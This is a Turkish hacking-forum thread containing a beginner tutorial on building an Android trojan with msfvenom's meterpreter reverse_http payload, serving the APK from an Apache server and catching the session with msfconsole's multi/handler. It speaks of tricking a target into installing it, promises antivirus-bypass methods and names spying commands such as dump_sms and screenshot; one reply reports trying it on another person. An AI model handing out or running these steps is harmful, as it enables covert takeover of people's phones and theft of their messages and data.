Detaylı Bİr Şekilde Başlangıç Seviye Andorid Trojan Ve Sızma // Yerel Ağ

ѕeleɴια

Kıdemli Üye
18 May 2018
2,619
907
ZYZZ
Merhaba değerli Türk Hack Team üyeleri bu konumda sizlere sıfırdan met@sploit ile android sızma göstereceğim dilerseniz konumuza geçelim.


KONU İÇERİKLERİ



1- Parrot Os İşletim Sistemi Nedir?
2- Payload Nedir
3- Android Cihazlara Yönelik Payload Nasıl Oluşturulur?
4- msfvenom Nedir?
5- Yerel Ağ Nedir?
6- Backdoor Nedir
7- Apache2 Server Nedir
8- Var www html Dizini Nedir?
9- Resimli Anlatım Ve Ek Detaylı Bilgiler
10- ANLAMAYANLAR İÇİN VİDEOLU ANLATIM :) ( konu sonu )






Parrot OS İşletim Sistemi Nedir?


Ben bu konuyu Parrot OS adlı bir işletim sistemi üzerinden anlatacağım. Sıfır seviye olarak düşündüğüm için sizi baştan sona anlatım yapacağım. Parrot OS işletim sistemi tıpkı kullandığınız windows gibi ama içinde hacklerlar için çeşitli siber güvenlik toolları ( araçları ) barındırıyor. Bu araçlar yardımı ile hacklerlar kendini geliştirebiliyor. Eğer Parrot OS kurulu değilse kendi yazmış olduğum


https://www.turkhackteam.org/linux/1942587-parrot-os-ova-olarak-kurulum-2020-guncel.html


Bu konuya bakabilirsiniz. Parrot u kurup açın.


NOT: Eğerki 4gb dan az bir rame sahip iseniz dual boot olarak kurulum yapınız.


Payload Nedir?


Biz bu konuda sizler ile beraber andorid cihazlara yönelik başlangıç seviyesi bir payload oluşturacağız. Payload sizin anlayabileceğiniz şekilde trojan anlamına gelebilir. Karşıya bir payload atıyoruz ve buna tıklatırdığımızda karşı cihaz ile bizim cihazımız arasında bir veri akışı sağlanmış oluyor ve karşıya sızmış oluyor. Truva atı türevi trojanler deniyor bu tarz trojanlere. Eğer trojan ne derseniz virüs de diyebiliriz. Karşıya bir apk veya exe dosyası atıyoruz ve sosyal mühendislik ile tıklattığımızda cihazımıza bir meterpreter açılıyor ve sızmış oluyoruz bunların hepsini anlatacağım şimdi.


Android Cihazlara Yönelik Payload Nasıl Oluşturulur


Parrot OS işletim sisteminin içinde barınan bir msfvenom adlı araçtan yazılımdan yararlanacağız.


msfvenom Nedir?


msfvenom met@sploit adlı sistemlere sızma testlerinde kullanılan bir araç için oluşturulmuş bir payload zararlı yazılım üretme yazılımıdır. msfvenom ve bir takım kodlar ile andorid cihazlara yönelik bir payload oluşturup bunu kendi yerel ağımızdaki telefonumuza atıp çalıştıracağız ve andorid cihazımıza sızacağız


Yerel Ağ Nedir?


Bu işlemlerde ağ yerel ve dış olarak ikiye ayrılır. Yerel ağ bizim kendi internetimizdir. Biz bu konuda yerel ağımıza yani kendi internetimiz üzerinde çalışan bir cihaza sızacağız. Daha sonra da detaylı bir şekilde dış ağa da anlatırım.


NOT: Bu bilgilerden önce bilmeniz gerekenler.


Backdoor Nedir?


Türkçe anlamında arka kapı anlamına gelmektedir. Backdoor bizim oluşturacağız trojandır aslında. Hedef sisteme sızdıktan sonra ona bir arka kapı yani backdoor açmış olacağız ve bu sayede arka kapıdan girerek sisteme başarılı bir şekilde sızmış olacağız.


Apache2 Server Nedir?


Apache2 server bizim kendi sanal makinemizin IP sinin bir web sitesidir. Sanal makinenizde ıp adresinizi öğrenmek için terminal e



Kod:
ifconfig


komtuu vardır. inet: yanında olan 10.0.2.15 gibi bir ıp adresi sizin local ıp nizdir. Apache2 server ise bu local ıp üzerinde çalışan bir web sunucu aracıdır. Apache2 serverını başlattıktan sonra web sitemiz aktif hale gelmiş olacak ve andorid cihazımızdan sanal aracımızın ıp sini chorme tarayıcıya girince ordan oluşturduğumuz payload ı andorid cihazımıza yükleyeceğiz.


Var www html Dizini Nedir?


Var/www/html dizini bizim apache2 sunucumuzun içine koymak istediğimiz şeyleri bu dizine koyuyoruz aslında. Bu dizinde backdoor adlı bir klasör açacağız ve içine payload ımızı oluşturacağız.


Ozaman Yapalım Şu İşi


Öncelikle var www html dizinine gidelim hep beraber.














Şimdi burda html programlama yazılım dili ile yazılmış dosyalar görüyoruz. Bunlar bize gerekli değil arkadaşlar bunları silebiliriz. Bu şekilde seçip sağ tıklayıp delete yapıyoruz. Amaaa bir sorun var değil mi ? :). Delete seçeneği kapalı görünüyor olacaktır. Bunun sebebi var dizininde root olmadığınız içinidr :)


root Ne Demek?


root işletim sistemlerinde admin anlamına gelir. root olmak admin olmak demektir ve makine de istediğimiz değişiklikleri yapabilme iznine sahip olduğumuz anlamına gelir. Ama Parrot OS sisteminde bazı dizinlerde admin değiliz ve bu yuzden bir klasör açamıyor bir şey silemiyor bir şey yapıştıramıyoruz. O dizinde admin olmalıyız ki işimizi görelim. Bunun çözümü de gayet basit arkadaşlar.


/var Dizininde Nasıl root Oluruz?


Var dizininde root olmak için komut satırı yani terminal de şöyle bir komutumuz var.


Kod:
sudo chown -R user:user /var


Bu komut /var da root olmanızı sağlıyor. user:user olan yere sizin makinenizin kullanıcı adı gelecek arkadaşlar. Kullanıcı adınız ise.





Burda böyle yazacaktır. Benimki arda olduğu için komut da belirttiğim user:user yerine arda:arda yazıyorum.





Ve bu komutu yazıp enterladıktan sonra bizden bir root şifresi yani admin şifremizi istiyor. Eğer parrot u benim konumdaki gibi kurduysanız oraya toor yazacaksınız ve enter yapacaksınız. Yazarken yazıyor olarak gözükmeyecektir bu güvenlik amaçlıdır. Parrot linux tabanlı bir sistemdir ve linux sistemleri güvenlikli sistemlerdir. Eğer dual boot olarak kurduysanız sizin belirttiğiniz root şifresini gireceksiniz oraya. Eğer konumda bir sorun anlamadığınız takıldığınız bir yer olursa buyrun çekinmeden imzamda belirtmiş olduğum adreslerden birine sorabilir bana ulaşabilirsiniz.





Evet root olduktan sonra o html dosyaları silip sağ tıklayıp yeni bir klasör açıyoruz. Bu klasör istediğiniz bir ad olabilir. Backdoor yapabilirsiniz. Şimdi ise gelelim payloadımızı trojanımızı backdoor umuzu nasıl tabir ederseniz bunu oluşturmayaa.


Yeni bir terminal komut satırı açın ve bunları kapatın.


Ve şöyle bir komutumuz var.





Kod:
msfvenom -p android/meterpreter/reverse_http LHOST= local ıp niz LPORT=4444 -o /var/www/html/Backdoor


Diye bir komutumuz var enter yapıp biraz beklediğimizde karşımıza yukarda verdiğim gibi resim çıkıyor ve bize kaç dosyanın kaç bayt olduğunu ve nereye oluşturduğunu gçsteriyor.


BU KOMUTU YAZMADAN ÖNCE!


LHOST Ve LPORT Kavramı


Komutda lhost ve lport diye bir şey belitrmişim. msfvenom ile bir arka kapı oluştururken sizden local ıp adresinizi ve bir port belirtmenizi istiyor arkadaşlar. Local ıp nizi ifconfig komutu ile örğreniyorsunuz. Yeni bir komut satırı açın ve şöyle yazın.


Kod:
ifconfig


Karşınıza çıkan inet: 10 ile başlayan sizin local ıp adresinizdir. Bunu belirttiğim LHOST= yerine yazacaksınız. Benim parrot dual boot olarak kurulu olduğu için ıp biraz farklı onu aldırış etmeden siz kendi ıp nizi giriniz. LPORT ise bir port adresi. Genelde payloadlar için 4444 444 7777 8080 8888 gibi portlar tercih edilir .Birini yazabilirsiniz. Şimdi ise bu terminali kapatmayın.


meterpreter Nedir?


meterpreter met@sploit aracına bağlı bir yazılımdır yine. Hedef sisteme trojanı tıklattığımızda karşımıza meterpreter diye bir dizin çıakcak ve bu dizin çıktığında artık sızmış olmuş demeksiniz.



-p payload belirtme -o ise kayıt yeri dir belirtmiş olduğum komutda.


Apache2 Server Başlatalım


Şimdi ise bizim trojanı kendi cihazımıza indireceğimiz web sunucumuzu başlatalım.





Kod:
service apache2 start


Komutu apache 2 sunucumuzu başlatmamızı sağlar. KOmut satırına bunu yazıp enter bastıktan sonra yine root şifresi isteyecek. Root şifrenizi girin ve enter basın. Şimdi ise msfconsole adlı bir aracı başlatacağız.


msfconsole Nedir?




msfconsole hedef sisteme sızma teslteri için yine met@ssploit aracına bağlı oluşturulmuş bir yazılımdır. msfconsole ile oluşturmuş olduğumuz arka kapıyı dinlemeye alacağız ve exploit ( sömür ) diyerek hedef sisteme sızacağız.



msfconsole u Başlatalımm


msfconsole u başlatmak için bu trojanı oluşturduğumuz terminali kapatmadan yeni bir terminal açıp şunu yazıyoruz.


Kod:
msfconsole


yaptktan sonra biraz bekliyoruz ve şöyle bir ekran çıkıyor karşımıza.







Bu çıkan resim değişiklik gösterebilir onu aldırış etmeyin önemli olan msf6 açılmış olmasıdır.


SOnra şöyle bir komutumuz var akradaşlar.


Kod:
use multi/handler


yapıyoruz ve mutli handler a geçiş yapıyoruz ve



Kod:
show options


ile mutli handler ayarlarını görüntülüyoruz.




Ve bu ayarları değiştireceğiz. LPORT aynı kalabilir onu zaten 4444 olarak belirlemiştik. ama LHOST ve payload ımızı belirlemeliyiz bunun için set komutu işimizi görecektir arkadaşlar.


Kod:
set LHOST local ıp
Kod:
set PAYLOAD android/meterpreter/reverse_http


Yapıyoruz eğer port farklı ise


Kod:
set LPORT 4444


yapıyoruz yani aslında belirtmiş olduğumuz ayarları buraya belirtiyoruz. daha sonrasında tekrar show options yaparsanız değişimi göreceksiniz.


Kod:
exploit


yapyıoruz ve bekliyoruz. Şimdi trojanımız dinlemeye alındı yani hedef kişinin trojana basmasını bekliyoruz. Bunun için andorid cihazınızı açın ve chorme tarayıcıyı açıp kendi sanal cihazınızın local ıp sini yazın o 10.0.2.15 gibi olan ıp den bahsediyoruz. Karşınıza index of diye bir yer çıkacak ordan Backdoor yerine basıp androjan.apk ya basıyoruz indir diyoruz. Sonra aç diyoruz sonra yine de yükle diyip gönderme diyoruz. Karşımzıa çıkan yerden devam diyoruz. Şİmdi msf de sosyal muhendislik zordur çünkü oluşturduğumuz payload güvenlik duvarları tarafından tanındığı için kişiye uyarı veriyor ama bu yöntemleri ve güvenliği bypass etme atlatma yöntemlerini de anlatacağım başlangıç seviyesinde olduğumuz için bu normal. Sonrasında trojene tıklıyoruz ve terminalde exploit ettiğimiz komut satırında değişik kodlar oluyor sa sızıyorsunuz demektir. Meterpreter açıldıktan sonra artık sızdınız :) help diyerek yapabileceklerinizi görebilirsiniz. Örneğin dump_sms ile sms lerini görebilirsiniz. screenshot ile ekran görüntüsü alabilirsiniz gibii


NOT: Teknik aksaklıklar dolayısıyla sızdıktan sonrasını gösteremiyorum onu bir sonraki konumda göstereceğim :)


Konum bu kadardı arkadaşlar iyi forumlar dilerim :)

[ame]https://www.youtube.com/watch?v=a5khwSL22wU[/ame]


Sesi biraz falza ayarlamışım bunun için kusura bakmayın..

Buda konu sonunda bahsettiğim video. Vide o da konudaki gibi açıklayıcı anlatım yapmıyorum bu video resimlerde anlamayan ve olayı anlık takip etmek isteyen arkadaşlarımız içindir tekrarardan iyi forumlar :)
 
Son düzenleme:

Voldemort

Üye
30 Nis 2020
220
1
Elinize sağlık,güzel ve dikkat çekici bir içerik olmuş ilgisi olanın işine yarayacağını düşünüyorum emeğinize sağlık....
 

ZuL-RaA

Kadim Üye
9 Ara 2017
5,550
837
Semerkant
Ellerinize sağlık. Ufak bazı hatalar farkettim onları belirteyim,

"yerel ağımızdaki telefonumuza atıp çalıştıracağız ve andorid cihazımıza sızacağız "

"Apache2 serverını başlattıktan sonra web sitemiz aktif hale gelmiş olacak ve andorid cihazımızdan sanal aracımızın ıp sini chorme tarayıcıya girince ordan oluşturduğumuz payload ı andorid cihazımıza yükleyeceğiz.
"

"nereye oluşturduğunu gçsteriyor."

"yapyıoruz ve bekliyoruz. Şimdi trojanımız dinlemeye alındı yani hedef kişinin trojana basmasını bekliyoruz. Bunun için andorid cihazınızı açın ve chorme tarayıcıyı açıp kendi sanal cihazınızın"

"Sesi biraz falza ayarlamışım bunun için kusura bakmayın.."

Birde root a admin değilde kök erişimi yani toptan değişiklik yapma izni desek hoş olurmuş. Ek olarak resimlerin arkasına Green Team veya THT resmi eklerseniz o da güzel olurdu. Emeğimizin direkt alınmaması için kenarına isminizi de yazabilirsiniz. :)

Birde sisteme sızdık kaldık şimdi ne yapacağız, bir sonraki konumuz için güzel bir başlık olur :))
 
Son düzenleme:

ѕeleɴια

Kıdemli Üye
18 May 2018
2,619
907
ZYZZ
Ellerinize sağlık. Ufak bazı hatalar farkettim onları belirteyim,



Birde root a admin değilde kök erişimi yani toptan değişiklik yapma izni desek hoş olurmuş. Ek olarak resimlerin arkasına Green Team veya THT resmi eklerseniz o da güzel olurdu. Emeğimizin direkt alınmaması için kenarına isminizi de yazabilirsiniz. :)

Birde sisteme sızdık kaldık şimdi ne yapacağız, bir sonraki konumuz için güzel bir başlık olur :))

ZuL-RaA merhaba çok teşekkürler. Logo ekleyeceğim teknik sorunlarım var bilgisayar donmaya başlayınca konuyu açıyorum ki donup kalıp konu gitmesin. Evet sisteme sızdıktan sonrasını da anlatmayı düşünüyorum :) teşekkürler fikir ve yorumlarınız için
 

H4FIZ123

Yeni üye
2 Ara 2019
11
0
selam hocam
her şeyi eksiksiz yaptım az çok biliyordum fakat başka birisi üzerinde denememiştim kişi uygulamayı açıp kurmasına rağmen bana hiç bir bilgi gelmedi sebebini bilmiyorum.Bilginiz var ise yardımcı olur musunuz?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.